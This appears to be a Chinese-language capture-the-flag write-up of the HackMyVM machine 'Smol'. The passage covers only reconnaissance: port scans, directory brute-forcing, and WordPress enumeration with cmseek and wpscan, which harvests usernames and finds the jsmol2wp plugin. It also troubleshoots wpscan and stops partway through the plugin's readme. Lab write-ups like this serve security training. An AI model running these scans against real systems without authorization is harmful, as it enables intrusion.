{"id":835,"date":"2025-06-07T15:52:51","date_gmt":"2025-06-07T07:52:51","guid":{"rendered":"http:\/\/162.14.82.114\/?p=835"},"modified":"2025-06-07T15:52:51","modified_gmt":"2025-06-07T07:52:51","slug":"hmv-_-smol","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/835\/06\/07\/2025\/","title":{"rendered":"hmv[-_-]Smol"},"content":{"rendered":"

Smol<\/h1>\n

\"image-20250607094448803\"<\/div>
\n
\"image-20250607095831139\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ rustscan -a $IP -- -sCV            \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\n\nOpen 192.168.10.100:22\nOpen 192.168.10.100:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq\/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi\/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+\/gIThU4ODr\/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk\/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF\/gS3jP\/fVw+H6Eyz\/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=\n|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL\/iO8JI5DrcvPDFlmqtX\/lzemir7W+WegC7hpoYpkPES6q+0\/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=\n|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG\/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-title: Did not follow redirect to http:\/\/www.smol.hmv\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u53d1\u73b0\u4e86\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff0c\u6dfb\u52a0\u4e00\u4e0b\uff1a<\/p>\n
192.168.10.100    www.smol.hmv<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ feroxbuster  -u http:\/\/smol.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php txt html -s 200 301 302 -d 1\n\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13                 ver: 2.11.0\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/smol.hmv\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 [200, 301, 302]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.11.0\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83d\udcb2  Extensions            \u2502 [php, txt, html]\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 1\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n301      GET        0l        0w        0c http:\/\/smol.hmv\/ => http:\/\/www.smol.hmv\/\n301      GET        0l        0w        0c http:\/\/smol.hmv\/index.php => http:\/\/www.smol.hmv\/\n301      GET        9l       28w      309c http:\/\/smol.hmv\/wp-content => http:\/\/smol.hmv\/wp-content\/\n200      GET       81l      274w     4537c http:\/\/smol.hmv\/wp-login.php\n200      GET      384l     3177w    19903c http:\/\/smol.hmv\/license.txt\n301      GET        9l       28w      310c http:\/\/smol.hmv\/wp-includes => http:\/\/smol.hmv\/wp-includes\/\n200      GET      394l      768w     6125c http:\/\/smol.hmv\/wp-admin\/css\/install.css\n200      GET       13l       78w     4373c http:\/\/smol.hmv\/wp-admin\/images\/wordpress-logo.png\n200      GET       23l       81w     1259c http:\/\/smol.hmv\/wp-admin\/upgrade.php\n302      GET        0l        0w        0c http:\/\/smol.hmv\/wp-admin\/ => http:\/\/www.smol.hmv\/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2F&reauth=1\n302      GET        0l        0w        0c http:\/\/smol.hmv\/wp-admin\/import.php => http:\/\/www.smol.hmv\/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fimport.php&reauth=1\n302      GET        0l        0w        0c http:\/\/smol.hmv\/wp-admin\/update-core.php => http:\/\/www.smol.hmv\/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fupdate-core.php&reauth=1\n200      GET       17l       82w     1261c http:\/\/smol.hmv\/wp-admin\/install.php\n200      GET       98l      836w     7425c http:\/\/smol.hmv\/readme.html\n200      GET        5l       15w      135c http:\/\/smol.hmv\/wp-trackback.php\n301      GET        9l       28w      307c http:\/\/smol.hmv\/wp-admin => http:\/\/smol.hmv\/wp-admin\/\n302      GET        0l        0w        0c http:\/\/smol.hmv\/wp-signup.php => http:\/\/www.smol.hmv\/wp-login.php?action=register\n[#######>------------] - 3m    319651\/882248  5m      found:17      errors:0      \n[####################] - 8m    882248\/882248  0s      found:17      errors:0      \n[####################] - 8m    882184\/882184  1953\/s  http:\/\/smol.hmv\/<\/code><\/pre>\n
\u535a\u5ba2\u626b\u63cf<\/h3>\n
\u770b\u4e0a\u53bb\u662f\u4e00\u4e2awordpress\uff0c\u5c1d\u8bd5\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ cmseek -u http:\/\/www.smol.hmv -v\n\n[i] Updating CMSeeK result index...\n[*] Report index updated successfully!\n\n ___ _  _ ____ ____ ____ _  _\n|    |\\\/| [__  |___ |___ |_\/  by @r3dhax0r\n|___ |  | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+]  CMS Detection And Deep Scan  [+] \n\n[i] Scanning Site: http:\/\/www.smol.hmv\n[+] User Agent: Mozilla\/5.0 (Windows NT 6.1; rv:12.0) Gecko\/20120403211507 Firefox\/12.0\n[+] Collecting Headers and Page Source for Analysis\n[+] Detection Started\n[+] Using headers to detect CMS (Stage 1 of 4)\n[*] CMS Detected, CMS ID: wp, Detection method: header\n[+] Getting CMS info from database\n[+] Starting WordPress DeepScan\n[+] Detecting Version and vulnerabilities\n[+] Generator Tag Available... Trying version detection using generator meta tag\n[*] Version Detected, WordPress Version 6.8.1\n[+] Initiating open directory and files check\n[+] XML-RPC interface not available\n[+] Looking for potential path disclosure\n[i] Checking user registration status\n[i] Starting passive plugin enumeration\n[*] 1 Plugin enumerated!\n[i] Starting passive theme enumeration\n[+] Looking for theme zip file!\n[*] 1 theme detected!\n[i] Starting Username Harvest\n[i] Harvesting usernames from wp-json api\n[!] Json api method failed trying with next\n[i] Harvesting usernames from jetpack public api\n[!] No results from jetpack api... maybe the site doesn't use jetpack\n[i] Harvesting usernames from wordpress author Parameter\n[*] Found user from source code: xavi\n[*] Found user from source code: diego\n[*] Found user from source code: gege\n[*] Found user from redirection: admin\n[*] Found user from redirection: think\n[*] Found user from redirection: wp\n[*] 6 Usernames were enumerated\n[i] Checking version vulnerabilities using wpvulns.com\n[x] Error Retriving data from wpvulndb\n___ _  _ ____ ____ ____ _  _\n|    |\\\/| [__  |___ |___ |_\/  by @r3dhax0r\n|___ |  | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+]  Deep Scan Results  [+] \n\n \u250f\u2501Target: www.smol.hmv\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Version: 6.8.1\n \u2503    \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Readme file found: http:\/\/www.smol.hmv\/readme.html\n \u2503    \u251c\u2500\u2500 License file: http:\/\/www.smol.hmv\/license.txt\n \u2503    \u251c\u2500\u2500 Uploads directory has listing enabled: http:\/\/www.smol.hmv\/wp-content\/uploads\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Plugins Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Plugin: jsmol2wp\n \u2503    \u2502        \u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 14.1.7\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\n \u2503    \u2502\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Theme: popularfx\n \u2503    \u2502        \u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 1.2.5\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\n \u2503    \u2502\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Usernames harvested: 6\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u251c\u2500\u2500 wp\n \u2503    \u2502    \u251c\u2500\u2500 think\n \u2503    \u2502    \u251c\u2500\u2500 diego\n \u2503    \u2502    \u251c\u2500\u2500 gege\n \u2503    \u2502    \u251c\u2500\u2500 xavi\n \u2503    \u2502    \u2570\u2500\u2500 admin\n \u2503    \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/Smol\/Result\/www.smol.hmv\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 0.88 Seconds, using 45 Requests\n\n CMSeeK says ~ addio<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u53d1\u73b0\u4e86\u82e5\u5e72\u7528\u6237\u4ee5\u53ca\u4e00\u4e2a\u63d2\u4ef6jsmol2wp<\/code>\uff0c\u7b80\u5355\u770b\u4e00\u4e0b\u53d1\u73b0\u4e0d\u5b58\u5728\u76f8\u5173\u6f0f\u6d1e\uff0c\u4f7f\u7528wpscan\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ wpscan --url http:\/\/www.smol.hmv --api-token xxxxxxxxxxxxxxxxxxx\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/www.smol.hmv\/ [192.168.10.100]\n[+] Started: Fri Jun  6 22:30:50 2025\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.41 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/www.smol.hmv\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/www.smol.hmv\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/www.smol.hmv\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/www.smol.hmv\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\nFingerprinting the version - Time: 00:00:03 <============================================================================================================> (702 \/ 702) 100.00% Time: 00:00:03[i] The WordPress version could not be detected.\n\n[+] WordPress theme in use: popularfx\n | Location: http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\/\n | Last Updated: 2024-11-19T00:00:00.000Z\n | Readme: http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\/readme.txt\n | [!] The version is out of date, the latest version is 1.2.6\n | Style URL: http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\/style.css?ver=1.2.5\n | Style Name: PopularFX\n | Style URI: https:\/\/popularfx.com\n | Description: Lightweight theme to make beautiful websites with Pagelayer. Includes 100s of pre-made templates to ...\n | Author: Pagelayer\n | Author URI: https:\/\/pagelayer.com\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.2.5 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/www.smol.hmv\/wp-content\/themes\/popularfx\/style.css?ver=1.2.5, Match: 'Version: 1.2.5'\n\n[+] Enumerating All Plugins (via Passive Methods)\n[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 0\n | Requests Remaining: 23\n\n[+] Finished: Fri Jun  6 22:30:58 2025\n[+] Requests Done: 706\n[+] Cached Requests: 609\n[+] Data Sent: 191.137 KB\n[+] Data Received: 179.346 KB\n[+] Memory used: 248.938 MB\n[+] Elapsed time: 00:00:07\n\nScan Aborted: wrong constant name \n\n            version_finder_module.const_set(constant_name, Module.new)\n                                 ^^^^^^^^^^\nTrace: \/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/lib\/wpscan\/db\/dynamic_finders\/plugin.rb:70:in `const_set'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/lib\/wpscan\/db\/dynamic_finders\/plugin.rb:70:in `maybe_create_module'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/lib\/wpscan\/db\/dynamic_finders\/plugin.rb:83:in `create_versions_finders'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/finders\/plugin_version.rb:23:in `create_and_load_dynamic_versions_finders'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/finders\/plugin_version.rb:16:in `initialize'\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/finders\/independent_finder.rb:12:in `new'\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/finders\/independent_finder.rb:12:in `find'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/models\/plugin.rb:34:in `version'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/controllers\/enumeration\/enum_methods.rb:79:in `each'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/controllers\/enumeration\/enum_methods.rb:79:in `enum_plugins'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/app\/controllers\/enumeration.rb:13:in `run'\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/controllers.rb:50:in `each'\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/controllers.rb:50:in `block in run'\n\/usr\/lib\/ruby\/3.1.0\/timeout.rb:84:in `timeout'\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/controllers.rb:45:in `run'\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/scan.rb:24:in `run'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/bin\/wpscan:17:in `block in <top (required)>'\n\/usr\/share\/rubygems-integration\/all\/gems\/cms_scanner-0.13.9\/lib\/cms_scanner\/scan.rb:15:in `initialize'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/bin\/wpscan:6:in `new'\n\/usr\/share\/rubygems-integration\/all\/gems\/wpscan-3.8.25\/bin\/wpscan:6:in `<top (required)>'\n\/usr\/bin\/wpscan:25:in `load'\n\/usr\/bin\/wpscan:25:in `<main>'<\/code><\/pre>\n
\u62a5\u9519\u5904\u7406<\/h3>\n
\u51fa\u73b0\u4e86\u5947\u602a\u7684\u62a5\u9519\uff0c\u4f46\u662f\u6211\u4e0d\u77e5\u9053\u8fd9\u4e2a\u62a5\u9519\u8be5\u548b\u89e3\u51b3\uff0c\u5c1d\u8bd5\u5347\u7ea7\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ sudo apt-get update && sudo apt-get upgrade\n# sudo apt autoremove<\/code><\/pre>\n
\u4f46\u662f\u5347\u7ea7\u5b8c\u4ee5\u540e\u51fa\u73b0\u4e86\u65b0\u7684\u62a5\u9519\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ wpscan             \n\/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1421:in `block in activate_dependencies': Could not find 'opt_parse_validator' (~> 1.9.5) among 159 total gem(s) (Gem::MissingSpecError)\nChecked in 'GEM_PATH=\/home\/kali\/.local\/share\/gem\/ruby\/3.1.0:\/var\/lib\/gems\/3.1.0:\/usr\/local\/lib\/ruby\/gems\/3.1.0:\/usr\/lib\/ruby\/gems\/3.1.0:\/usr\/lib\/x86_64-linux-gnu\/ruby\/gems\/3.1.0:\/usr\/share\/rubygems-integration\/3.1.0:\/usr\/share\/rubygems-integration\/all:\/usr\/lib\/x86_64-linux-gnu\/rubygems-integration\/3.1.0' at: \/usr\/share\/rubygems-integration\/all\/specifications\/cms_scanner-0.13.9.gemspec, execute `gem env` for more information\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1407:in `each'\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1407:in `activate_dependencies'\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1389:in `activate'\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1423:in `block in activate_dependencies'\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1407:in `each'\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1407:in `activate_dependencies'\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems\/specification.rb:1389:in `activate'\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems.rb:290:in `block in activate_bin_path'\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems.rb:289:in `synchronize'\n        from \/usr\/lib\/ruby\/vendor_ruby\/rubygems.rb:289:in `activate_bin_path'\n        from \/usr\/bin\/wpscan:25:in `<main>'<\/code><\/pre>\n
\u5c1d\u8bd5\u89e3\u51b3\uff0c\u5728github\u53d1\u73b0\u4e86\u4e00\u4e2a\u5927\u4f6c\u7684\u89e3\u51b3\u65b9\u6848\uff1a<\/p>\n
\n
https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1243#issuecomment-489421054<\/a><\/p>\n
Resolved the same issue. In my fix, I did NOT uninstall anything.<\/p>\n
apt-get install ruby-dev
\ngem install ffi --platform=ruby
\ngem install yajl-ruby
\napt-get install libxslt-dev libxml2-dev
\ngem install nokogiri -- --use-system-libraries<\/p>\n
Then wpscan worked.<\/p>\n<\/blockquote>\n
\u4f46\u662f\u5e76\u672a\u5b8c\u5168\u89e3\u51b3\uff0c\u4e0d\u614c\uff0c\u56de\u5934\u6362\u4e2akali<\/p>\n
\u63d2\u4ef6\u6f0f\u6d1e\u5229\u7528<\/h3>\n
\u5c1d\u8bd5google\u4e00\u4e0b\u63d2\u4ef6\u7684\u76f8\u5173\u6f0f\u6d1e\uff0c\u5148\u770b\u4e00\u4e0b\u7248\u672c\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\/ | html2text\n****** Index of \/wp-content\/plugins\/jsmol2wp ******\n[[ICO]]       Name                  Last_modified    Size Description\n===========================================================================\n[[PARENTDIR]] Parent_Directory                         -  \n[[   ]]       JSmol.min.js          2023-08-16 20:24 224K  \n[[   ]]       JSmol.min.nojq.js     2023-08-16 20:24 129K  \n[[   ]]       add-textdomain.php    2023-08-16 20:24 4.6K  \n[[   ]]       class.jsMol2wp.php    2023-08-16 20:24 9.8K  \n[[DIR]]       css\/                  2023-08-16 20:22    -  \n[[TXT]]       help.htm              2023-08-16 20:24 9.0K  \n[[DIR]]       idioma\/               2023-08-16 20:22    -  \n[[DIR]]       images\/               2023-08-16 20:22    -  \n[[DIR]]       j2s\/                  2023-08-16 20:22    -  \n[[   ]]       jsmol2wp.php          2023-08-16 20:24 2.4K  \n[[TXT]]       jsmol_template.htm    2023-08-16 20:24 2.0K  \n[[DIR]]       php\/                  2023-08-16 20:22    -  \n[[TXT]]       readme.txt            2023-08-16 20:24 5.2K  \n[[TXT]]       simple.htm            2023-08-16 20:24 6.3K  \n[[TXT]]       updating_jsmol2wp.txt 2023-08-16 20:24  475  \n===========================================================================\n     Apache\/2.4.41 (Ubuntu) Server at www.smol.hmv Port 80\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\/readme.txt | html2text\n=== JSmol2WP === Contributors: Jim Hu Tags: shortcodes, JSmol, Jmol, molecular\ngraphics, PDB Requires at least: 3.0 Tested up to: 4.9.4 Donate link:http:\/\/\nbiochemistry.tamu.edu\/index.php\/alum\/giving\/ Stable tag: 1.07 License: GPLv2 or\nlater License URI: http:\/\/www.gnu.org\/licenses\/gpl-2.0.html Text domain:\njsmol2wp Domain path:\/languages\/ Plugin to place JSmol molecular graphics\napplets in WordPress posts or pages. == Description == This shortcode plugin\nplaces JSmol applets in WordPress posts and pages. Use [jsmol pdb='accession']\nfor a minimal version. jsmol2wp will look to see if a pdb file has been\nuploaded to your wordpress and it will use that file if it can find it. If it\ncan't find a matching post for an uploaded attachement, it will try http:\/\/\nrcsb.org\/pdb. If it can't find a match there either, you'll get an error\nmessage in the JSmol window. Additional information on optional parameters are\nat the About\/Help link in the applets. This plugin was developed for use on the\nwebsite for the Department of Biochemistry and Biophysics at Texas A&M\nUniversity (http:\/\/biochemistry.tamu.edu). == Installation == Place in the\nplugins directory and activate. No additional files or configurations are\nneeded. Thanks to Bob Hanson and the JMol team for making the javascript code\nfor jsmol available. See: http:\/\/chemapps.stolaf.edu\/jmol\/jsmol http:\/\/\nwiki.jmol.org\/index.php\/Jmol_JavaScript_Object This plugin also benefited from\nusing Jaime Prilusky's mediawiki extension for inspiration http:\/\/\nproteopedia.org\/support\/JSmolExtension\/ == Upgrade Notice == Version 1.03\nupdates the Jmol libraries and fixes a bug with the load parameter ==\nFrequently Asked Questions == = Is there an example of an installation? = See\nhttp:\/\/jimhu.org\/jsmol2wp-plugin-released-at-wordpress-org\/ = Where can I learn\nmore about what JSmol can do? = Jmol documentation can be found at http:\/\/\njmol.sourceforge.net\/#Learn%20to%20use%20Jmol and http:\/\/jmol.sourceforge.net\/\ndocs\/JmolUserGuide\/ == Screenshots == 1. Applet for a protein. 2. Applet for a\nsmall molecule. == Changelog == = 1.07 = fix extremely stupid svn error where\nneeded files from the j2s directory were not in the repo = 1.06 = change rcsb\nfile path to avoid redirect = 1.05 = load rcsb pdb files via https instead of\nhttp = 1.04 = * updated jsmol package from Jmol sourceforge * first attempt at\ninternationalization ** Added idioma directory from jsMol distributions **\nAdded set language directive based on wordpress get_locale() = 1.03 = * updated\njsmol package from Jmol sourceforge * Remove beta from help.htm * fix bug where\nload param was not working = 1.02 = * fixes to this readme.txt file to improve\nthe display at the wordpress.org plugin repository = 1.01 = * tweaks for\nwordpress.org deposition = 1.0 = * update JSmol code to 14.3.12_2015.01.28 *\nprepare for release to wordpress.org plugin repository = 0.94 beta = * add\nisosurface support * rewrite the code to set up structure loading * replace WP\nget_page_by_title with a function that matches the filename * add jvxl to file\ntypes * fixed bug where caption nonmatching required casting match as a string.\n* move the help demo page to a more stable URL. = 0.93 beta = * set default\ntype based on fileurl extension if present * fix bug where reset button failed\nwith data from fileurl = 0.92 beta = * change appletID to not require $acc. =\n0.9 beta = * improve help page * improve uniqueness identifiers for multiple\nJmolapplets on the same post\/page; add the option to hand code instances *\nimprove debug messages (or at least change them) * make reset button standard\nand have it remember the load commands * standard buttons depend on the type of\nmolecule loaded. * add some semicolons to the template to try to fix lint\nwarnings: http:\/\/www.javascriptlint.com\/online_lint.php = 0.8 beta = * removed\ndata directory * changed system for counting instances of the shorttag so we\ndon't need preg_match * removed whitespace from template hoping that solves the\nproblem of themes adding markup * simplified load script as suggested by Bob\nHansen * made applet IDs more unique by appending post id = 0.7 beta = * update\njsmol libraries to 4.1.7_2014.06.09 * add dependencies for jquery-ui-core and\njquery-ui-menu fixes popup problem in some themes * refactor to support\nadditional file types (in progress) * fix multiline regex bug * fix bug that\ncaused failure to load when permalinks used ?p=post_number format * debug\nconstructor * debug view ..* add path to uploaded file ..* add test for\nget_page_by_title = 0.6 alpha = * register script before enqueueing it. * added\nability to add Jmol.script commands * added the ability to add jmolCommandInput\n= 0.5 alpha = * added wrap and debug options = 0.4 alpha = * changed to nojq. *\nmodified command processing to not split on allowed characters in Jmol syntax.\n= 0.3 alpha = * changed default to spin off in order to save client cpu *\ncustom command buttons working. = 0.2 alpha = * changed system to use a\ntemplate based on the distro file simple1.htm. * added 